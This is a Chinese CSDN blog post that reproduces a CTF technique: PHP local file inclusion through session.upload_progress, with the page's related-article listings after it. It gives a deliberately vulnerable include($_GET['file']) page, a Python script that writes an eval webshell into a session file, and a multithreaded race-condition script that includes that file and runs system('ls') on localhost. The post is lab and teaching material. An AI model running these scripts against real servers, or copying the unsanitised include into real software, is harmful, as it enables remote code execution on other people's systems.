利用session.upload_progress进行文件包含

最新推荐文章于 2024-01-11 23:00:00 发布
最新推荐文章于 2024-01-11 23:00:00 发布
阅读量415 收藏 1
点赞数 3
分类专栏: 文件读取 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/117132825
版权
本文介绍了如何利用PHP的session.upload_progress特性来构造木马,并通过关闭session.upload_progress.cleanup配置,避免文件被删除。通过多线程并发写入和读取session文件,实现了条件竞争,成功绕过默认清理机制,执行了远程命令。实验中,使用Python发送POST请求写入木马,并在浏览器中触发执行。
摘要由CSDN通过智能技术生成

这次ciscn有一道web题考的就是这个知识点,但当时没有尝试去扫路径,被开头给的源码卡死了有点儿遗憾,不过还是想自己复现一下这个小trick。

先来看看php手册对此的描述。
在这里插入图片描述
我们可以post session.upload_progress参数,写入木马。
在这里插入图片描述
这个选项可以让我们自己定义文件名。
例如,控制phsession=flag,则文件名就变为/tmp/sess_flag
这里还有一个配置选项是默认开启的
session.upload_progress.cleanup,这个选项会让post进程结束时删掉所有session文件。
我们先在php.ini里面关掉这个配置,结合上面的内容写木马试试。
session.php

<?php
    $file = $_GET['file'];
    include($file);
    ?>

exp1.py

import io
import requests
import threading

sessid = 'aaaaaaa'

def write_session(session):
    url = '127.0.0.1/session.php'
    f = io.BytesIO(b'a' * 1024 * 50)
    resp = session.post( 'http://127.0.0.1/session.php?file=1.txt', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'}, files={'file': ('fmyyy.txt',f)}, cookies={'PHPSESSID': sessid} )


if __name__ == '__main__':
    with requests.session() as session:
        write_session(session)

准备好了,运行exp1.py
来看看session文件目录多了什么。
在这里插入图片描述
多了个sess_aaaaaaa
看一下里面的内容。
在这里插入图片描述
可以看到,再开头这边木马已经被写入。我们在浏览器试试这个木马。
在这里插入图片描述
成功执行。

可以看到这个session是可以包含的,但session.upload_progress.cleanup这个配置是默认开启的,所以这里我们就需要利用条件竞争了。
在这里插入图片描述

import io
import requests
import threading
sessid = 'bbbbbbb'
data = {"cmd":"system('ls');"}
def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post( 'http://127.0.0.1/session.php', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'}, files={'file': ('1.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
    while True:
        resp = session.post('http://127.0.0.1/session.php?file=/Applications/phpstudy/Extensions/tmp/tmp/sess_'+sessid,data=data)
        if '1.txt' in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+++++++++++++]retry")
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in range(1,30): 
            threading.Thread(target=write,args=(session,)).start()

        for i in range(1,30):
            threading.Thread(target=read,args=(session,)).start()
    event.set()
fmyyy1
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
uploadProgress上传显示进度条
08-27
uploadProgress上传显示进度条
【漏洞复现】ThinkPHP 小于 6.0.2 session id未作过滤漏洞导致的任意写文件
m0_46344990的博客
04-20 1914
一、漏洞描述 ThinkPHP6.0.0到ThinkPHP6.0.1,由不安全的SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。 二、漏洞发现 首先我们下载好thinkphp6.0.0源码,网上搜一搜就出来了。将源码放在phpstudy的www目录下。注意需要运行环境php7.1+。先在/app/middleware.php中开启session。 然后在/app/controller/
文件包含骚姿势——利用session.upload_progress进行文件包含
weixin_46330722的博客
12-25 1997
利用session.upload_progress进行文件包含
记一次PHP_SESSION_UPLOAD_PROGRESS的本地文件包含
末初的CSDN博客
05-07 928
来源于今天一位朋友给的题目,叫我帮忙看看 题目名字是有提示LFI,这个登录框测试了一下发现输入什么都是返回一样,也没有有注入的迹象,url很明显可能存在LFI,尝试下读取logo.php /?page=php://filter/convert.base64-encode/resource=login.php 有过滤,简单fuzz了下发现过滤了如下 base、file、http、ftp、phar、gopher、data、zip、read、rot、string、decode、flag、..... 但.
PHP基于session.upload_progress 实现文件上传进度显示功能详解
01-02
本文实例讲述了PHP基于session.upload_progress 实现文件上传进度显示功能。分享给大家供大家参考,具体如下: 介绍 session.upload_progress 是PHP5.4的新特征。 当 session.upload_progress.enabled INI 选项开启...
PHP文件上传进度条插件js版 不需要修改php的session.upload-progress或安装额外的php模块等
08-16
一,插件名 UploadiFive 二,apache或iis等服务器.需要修改文件上传大小时间等限制 三,文件默认上传到网站根目录的/Uploads/exe_file/目录中 四,默认不修改文件名,所以,上传的文件,不得有空格,中文斜线等非法字符
PHP中使用Session配合Javascript实现文件上传进度条功能
10-25
- session.upload_progress.cleanup: 设置在文件上传请求完成提交后,是否清除session中的相关信息,默认值为1(开启)。 - session.upload_progress.prefix: 设置存储上传进度信息的session变量名前缀。 - session....
PHP使用Session实现上传进度功能详解
10-16
- `session.upload_progress.cleanup`:默认设置为1,表示文件上传完成后清理相关的session数据。 - `session.upload_progress.prefix`:定义session中存储上传进度信息的键的前缀。 - `session.upload_progress....
session.upload_progress文件包含
Aiwin的博客
05-29 840
session.upload_progress文件包含
NeatUpload大文件上传(进度条显示)组件及演示源码
06-15
NeatUpload大文件上传(进度条显示)组件及演示源码
文件上传onUploadProgress使用
热门推荐
梧桐芊羽的博客
09-29 1万+
api /** * 添加音乐 */ export function AddMusics(filelist, conf) { return http.post('/musicManage/addMusic', filelist,conf) } UploadMusic.vue <template> <div class="fileupload"> <div class="fileupload-title"> <el-button
el-upload 配合 axios 的 onUploadProgress 方法上传实时进度条展示。
qq_23207707的博客
03-21 4611
el-progress 动态进度
Element|Upload结合Progress实现上传展示进度条
最新发布
Mr.小灰狼_随笔
01-11 7538
Element|Upload结合Progress实现上传展示进度条 背景 : 项目里的 附件上传 题型组件,用户在上传过程中,如果文件较大,上传过程较慢,而又没有一个类似 Loading... 的加载过程的话,会显得干愣愣的,用户体验较差,所以需要添加一个进度条来提示用户上传的进度,下面有两种方式,一种假的,一种真的,伙伴们可根据需求自行选取实现。
对于session.upload_progress漏洞的理解
Huamang的博客
03-06 996
先放两个文章: https://www.freebuf.com/vuls/202819.html https://www.cnblogs.com/NPFS/p/13795170.html 利用session.upload_progress进行文件包含: 信息介绍: session.use_strict_mode默认值为0,此时用户是可以自己定义Session ID的。 比如,我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag(还有可能在 /v
session.upload_progress进行文件包含和反序列化学习
snowlyzz的博客
09-07 478
利用session.upload_progress进行文件包含
[CTFSHOW]利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含
Y4tacker的博客
11-02 2196
文章目录代码审计脚本参考文章 代码审计 考点是:利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含 通过观察代码,可以看到过滤了大部分的文件包含函数,这里我们利用PHP_SESSION_UPLOAD_PROGRESS加条件竞争进行文件包含,具体原理可以看看下面这篇参考文章 <?php if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file);
文件包含漏洞之日志利用
GHD_Nidhogg的博客
03-13 1207
Apache日志 某php文件存在本地文件包含漏洞,但无法上传文件,此时可以找到Apache路径,利用包含漏洞包含Apache日志文件也可以获取WebShell Apache运行后一般默认会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),Apache的访问日志文件记录了客户端的每次请求及服务器响应的相关信息。 127.0.0.1 - - [0...
基于session.upload_progress 的文件上传进度显示
koastal的博客
10-31 5636
介绍session.upload_progress 是PHP5.4的新特征。 当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以发送一个POST请求到终端(例如通过XHR)来检查这个状态。 当一个上传在处理中,同时POST一个与INI中设置的s
php session.save_path
06-11
php session.save_path 是用来设置 PHP 应用程序存储 Session 数据的路径。Session 是一种在 Web 应用程序中用来存储用户数据的机制,PHP 使用一个名为 "Session ID" 的标识符来跟踪用户的 Session 数据。当用户打开一个页面时,PHP 会自动创建一个 Session ID,并将其存储在客户端的 Cookie 中。当用户访问其他页面时,PHP 会通过 Session ID 来检索该用户的 Session 数据。如果未设置 session.save_path,则 PHP 将使用默认路径来存储 Session 数据。可以通过在 php.ini 文件中设置 session.save_path 来更改默认路径。例如,可以将 session.save_path 设置为 "/tmp",以将 Session 数据存储在 /tmp 目录中。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值